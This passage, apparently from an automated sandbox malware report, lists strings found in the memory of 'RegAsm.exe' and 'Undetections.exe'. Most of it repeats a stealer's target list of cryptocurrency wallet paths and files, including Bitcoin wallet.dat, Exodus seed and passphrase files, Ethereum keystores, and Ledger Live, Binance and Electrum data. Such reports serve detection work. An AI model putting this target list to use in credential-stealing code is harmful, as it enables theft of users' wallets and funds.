Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fppC
                          Source: Undetections.exe, 00000000.00000002.4110420914.000000000745E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ethereum
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local 